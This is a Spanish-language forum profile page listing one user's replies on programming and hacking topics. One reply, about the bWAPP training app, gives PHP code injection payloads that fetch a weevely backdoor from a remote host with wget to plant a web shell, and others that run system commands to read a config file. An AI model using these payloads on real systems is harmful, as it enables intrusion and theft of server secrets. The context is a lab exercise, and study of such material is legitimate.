Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Mortal_Poison

#141
Python / Re:Subdomining - Subdominios sin bruteforcing
Noviembre 19, 2017, 08:20:24 PM

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¡Está genial!, la verdad me parece una pasada que la comunidad comparta herramientas, eso me encanta. Yo creería que se podría crear un estilo de reposito a estilo de GitHub pero para Underc0de, donde el hecho es centralizar este tipo de tools que para alguien han de ser útiles en algún momento :).

Aparte de eso, lo que andabas buscando de Tweepy, yo tengo la solución, trabajé con ello ya hace varios años pero funciona perfectamente :). Déjame si hoy posteo en el foro y así también aporto.

Un saludo.
#142
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buenas.
He tratado de configurar XAMPP para que ejecute los cgi pero de ha sido infructuoso. He modificado el archivo httpd.conf y no ha habido forma.

¿Alguien  ha encontrado la solución a este dichoso problema?

Usa WampServer. De otra manera, configurar Xampp es mucho más tedioso para el tema de los CGI.

Nos cuentas.

Un saludo.
#143
Hacking / Re:[TOOL] Underc0de Dorker
Noviembre 14, 2017, 08:22:38 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¡Excelente! aunque esa se me parece a una tool de WizardSec, lo conozco y una vez me la mostró. De hecho, creo que You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un saludo y buen aporte.


Si! Así es, acordé en su día pasarla a C# pero nunca lo hice, así que el otro día saqué un rato y lo hice :)

No encontré el post así que no la linkeé, ahora lo edito ;)

PD: La tool lleva agradecimientos a él.

Gracias!


Claro que sí, lo decía no más porque me acordé xD.
Mira, si quieres, hice esto en Photoshop, así se le da un poco más de estilo por el tema del color:



Úsala si te parece bien, sino, ya haré una mejor y te la compartiré.

A ver si pienso en alguna idea y quizá se la puedas agregar, de momento va genial ;D.

Un saludo.


Genial! Me encanta, luego la añado sin dudarlo.

Había pensado en hacer un repositorio de dorks e ir actualizándolas, así cada vez que se abre el programa, comprueba la lista y las descarga si fuese necesario.

Tengo alguna idea más, pero si, si se te ocurre algo avísame y lo implementamos :)

Gracias!

¡Perfecto Black! Lo de las dorks, podrían subirse a Github o en su defecto, en un espacio de Underc0de. Me parece muy chévere la idea de que se actualice cuando la tool detecte que hay nuevos dorks :D. Cualquier cosa te mando MP para aportarte las ideas y no hacer este hilo cómo si fuera una publicación de Facebook xD(largo).

Un saludo.
#144
Hacking / Re:[TOOL] Underc0de Dorker
Noviembre 14, 2017, 08:06:13 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¡Excelente! aunque esa se me parece a una tool de WizardSec, lo conozco y una vez me la mostró. De hecho, creo que You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un saludo y buen aporte.


Si! Así es, acordé en su día pasarla a C# pero nunca lo hice, así que el otro día saqué un rato y lo hice :)

No encontré el post así que no la linkeé, ahora lo edito ;)

PD: La tool lleva agradecimientos a él.

Gracias!


Claro que sí, lo decía no más porque me acordé xD.
Mira, si quieres, hice esto en Photoshop, así se le da un poco más de estilo por el tema del color:



Úsala si te parece bien, sino, ya haré una mejor y te la compartiré.

A ver si pienso en alguna idea y quizá se la puedas agregar, de momento va genial ;D.

Un saludo.
#145
Hacking / Re:[TOOL] Underc0de Dorker
Noviembre 14, 2017, 05:04:09 PM

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¡Excelente! aunque esa se me parece a una tool de WizardSec, lo conozco y una vez me la mostró. De hecho, creo que You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un saludo y buen aporte.
#146

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Se torna complicado de manera portátil, debido a que deberías cambiar como se muestra el echo con uso de API's específicas. Si usas Unix, puedes usar la librería de curses, pero por ejemplo, esta no es multiplataforma.

Sin embargo, está getpass() la cual sí que es multiplataforma y mira el siguiente ejemplo:

Código: python

#!/usr/bin/python
# -*- coding: utf-8 -*-
import getpass   
my_pwd = getpass.getpass(stream=None)
print(my_pwd)


La salida será:
Password:
Mortal_Poison


No se te mostrará la contraseña a medida que la introduces, pero al final si lo hará por el print.
Como tu pregunta iba enfocada a cómo hacerlo, lo he hecho rápidamente en Python 2.7, sin embargo, lo puedes adaptar a las versiones 3.x:

Código: python

#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys, msvcrt

# Función para obtener nuestra contraseña y además, ocultar los caracteres.
def pass_convert(prompt = 'Enter your password: ', hideChar = ' '):
    # Contador e inicialización de variables.
    count = 0
    password = ''
     
    for chararacter_to_get in prompt:
        msvcrt.putch(chararacter_to_get) # Obtenemos los caracteres de nuestra cadena recibida, es decir, nuestra contraseña.

    # Creamos loop infinito
    while True:
       
        # Leemos la pulsación de las teclas y nos devuelve el carácter resultante como una cadena de bytes.
        char_get = msvcrt.getch()
       
        # Condicionamos para los saltos de linea e indentaciones.
        if char_get == '\n' or char_get == '\r':
            break

        # Como getch() no funciona con ctrl+c, realizamos el mismo procedimiento.
        if char_get == '\003':
            raise KeyboardInterrupt

        # Retroceso ASCII.
        if char_get == '\b':
            count -= 1
            # Cortamos la cadena para omitir el último carácter.
            password = password[:-1]
            # Si nuestro contador es mayor que 0...
            if count >= 0:
                # No almacenamos el búfer e imprimimos la cadena de bytes char.
                msvcrt.putch('\b')
                msvcrt.putch(' ')
                msvcrt.putch('\b')     
        else:
            if count < 0:
                count = 0
            # Lo que hacemos aquí ya es poner nuestros respectivos carácteres cuando escribimos.
            count += 1
            password += char_get
            msvcrt.putch(hideChar)

    # Retorno de carro y salto de línea.
    print("\r\n")
   
    # Retornamos nuestra contraseña siempre y cuando nuestra contraseña sea diferente de " ".
    return "'%s'" % password if password != '' else "''"

# Indicamos qué carácter queremos que se muestre a medida que ingresamos nuestra contraseña.
password = pass_convert(hideChar = '*')
# Mostraremos nuestra contraseña final, sin los asteriscos.
print('password is:' + '\n> ' + password)


La salida será de tipo:

E:\>python You are not allowed to view links.
 You are not allowed to view links.
 Register or Login or You are not allowed to view links.
 Register or Login
Enter your password: *************
password is:
> 'Mortal_Poison'



Puedes ver más información en la documentación de Python de las funciones usadas You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Como te mencioné, no es de hacerlo en una línea, lleva un proceso. Espero y te haya servido....

Un saludo.
[/font]
#147
Dudas y pedidos generales / Re:Paypal en modo produccion
Noviembre 14, 2017, 11:45:41 AM
Hola $francisco,

Por lo que veo, tu tipo de transacciones es de tipo de "Pagos personales". Puede implementar Pagos personales utilizando la API clásica que se denomina "Pagos adaptables". Todo lo que necesitas es establecer PaymentType como "PERSONAL" si sus casos de uso de pago califican como pagos personales, que por lo requerido, así es. Puedes encontrar más información sobre cómo usar la API de Adaptive Payments aquí:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Un saludo.
#148

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un gusto que te haya gustado ;D. Te invito a pasarte por los demás hilos en los demás foros.

Un saludo.
#149

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Lo que te comenta @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login es correcto, también me gustaría añadir que podrías modificar el código de Neptuno, una tool que copia archivos de manera "silenciosa". Te dejo un link para que conozcas más de el.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un saludo.

Posdata: si lo modificas, realiza el release y publicalo aquí en underc0de, le servirá a cualquier otra persona.
#150

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Me disculpo, lo de script ignóralo(estaba pensando otra cosa). Simplemente te comentaba que el action del form lo cambies a lo que te puse.
Ahora, revisate esto:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Te puse lo del action del form precisamente para ver si funciona de esa manera.

Un saludo.

Agrego algo y es, revisa la configuración del Xampp, te puede estar ocasionando problemas. Además, podrías verificar como te mencioné, de esa forma verificarás que todo funcione bien e ir descartando opciones.

#151


Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Quisiera comenzar, ¿intentaste poniéndole aparte de .exe en el form un CGI? me refiero, te quedaría algo como:

Código: cpp


     <form action="/cgi-bin/cpp_get.cgi" method="get">
        <input type="text" name="nombre" value="Nombre:" class="input">
        <input type="text" name="apellido" value="Apellido:" class="input">
        <input type="submit" name="submit" value="Aceptar" class="button">

    </form>



Tendrías que obtenerlo de la siguiente forma: /cgi-bin/cpp_get.cgi?nombre=XXX&apellido=XXXX

Inténtalo de esa manera y no llamando el .exe.

Un saludo.

Posdata: no me acuerdo mucho de la sintaxis, pero si ni así, por favor coméntalo.
[/font]
#152

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Tienes razón, suele pasar que hay muchas personas que publican cursos de paga, de a 25,50 o hasta 100 carpetas. Es muchísimo material, pero siempre tuve en cuenta que leer todo eso, es muy complicado por el tiempo que dispongo(y podría asumir que para la mayoría también).

Así que simplemente me concentro en lo que realmente deseo aprender, obviamente, si existe un libro que abarque el tema, lo leo.

Por otra parte, también suelo estar en sandbox para la lectura del material. De hecho, también tengo muchos libros de la Deep Web(de Pentesing claro), están muy buenos xD.

Un saludo.
#153

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Muchas gracias y sí, la verdad trabajar con imágenes es muy chévere. Python nos ofrece esa flexibilidad y bueno, no nos queda de otra que aprovecharla.

Un saludo y gracias por tu comentario ;D.
#154

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

¡Súper tu aporte! también añado que si desean hacerlo de forma automática, pueden poner en su terminal de Kali Linux:

hash-identifier

Y próximamente poner el hash a reconocer.

Puede reconocer varios tipos de hashes y está hecho por Z1on3R, de BlackPloit.

Un saludo.
#155
Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

No te deberías preocupar si el material es netamente tuyo, si es comprado o si los vídeos, también los has adquirido de forma legal.
Sin embargo, al ser P2P se complica un poco, porque si un usuario llegara a denunciarte con la entidad de la cual es dueño dicho producto, te van a hacer verificar que lo que estás haciendo, lo adquiriste de forma legítima.

Además de eso, si piensas subirlos para que la gente la descargue es peor, porque es piratería y además de eso, eso es ilegal y hasta está penado(no sé si se irían hasta ese punto).

Un saludo.
#156
Dudas y pedidos generales / Re:bWAPP PHP code Injection
Noviembre 06, 2017, 02:44:27 PM
Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Existen diversas formas, sin embargo, genera un backdoor con weevely y ese backdoor lo subes a una plataforma de almacenamiento.

Si notas, el message lo recibe como parámetro, por tanto, puedes ejecutar lo siguiente con un wget y hacerle una inyección para subirle shell.

Código: php
shell_exec(wget tu_servidor_donde_alojaste_tu_backdoor.com/mortal.txt -O output.php)


Y listo, accederías según veo, a tu dirección 192.168.1.127/bWAPP/shell.php.


Se me olvidó, no revisé lo de htmlspecialchars, al no permitir el shell_exec y filtrar, lo que podemos hacer es: intentar poner por ejemplo: message=cualquiera;system('ls -la');

También podrías intentar message=system(%27cat%20config.inc%27); e irte a ver el código fuente, a ver si lograses ver información útil.



Un saludo.
#157

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Realmente las limitaciones suelen ser muy pocas, de resto, es muy potente. Muchos de los que dicen esto o aquello, no poseen argumentos válidos.

Un saludo.
#158
Python / Re:[PARTE 1] ¡Aprende Python Avanzado!
Noviembre 05, 2017, 10:09:49 PM

Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Así es, concuerdo con lo que mencionas.

Un saludo.
#159
Otros lenguajes / Re:Cramel Editor v1.0 by fudmario
Noviembre 05, 2017, 10:08:05 PM

Hola Fudmario,

Está súper bueno el Editor, a ver si dispongo de un tiempo y saco un par de tools pero con Cramel ;D.

Un saludo y realmente un gran trabajo.
#160
Debates, Reviews y Opiniones / Re:¿Qué opinan de Java?
Noviembre 05, 2017, 12:00:57 PM
Hola You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Claro que sí, todos esos conceptos a uno le hacen cambiar la perspectiva cuando uno desarrolla. Por otra parte, ni JSF/JSP me han gustado mucho, por eso no los he trabajado mucho. Prefiero un Symfony de PHP por ejemplo, ya va a cuestión de gustos. También lo encontré a él(KeepToo) porque antes hacía las GUI's con JavaFX. Sin embargo, con Swing también pueden quedar bonitas y él nos lo demostró.

Un saludo y happy hacking.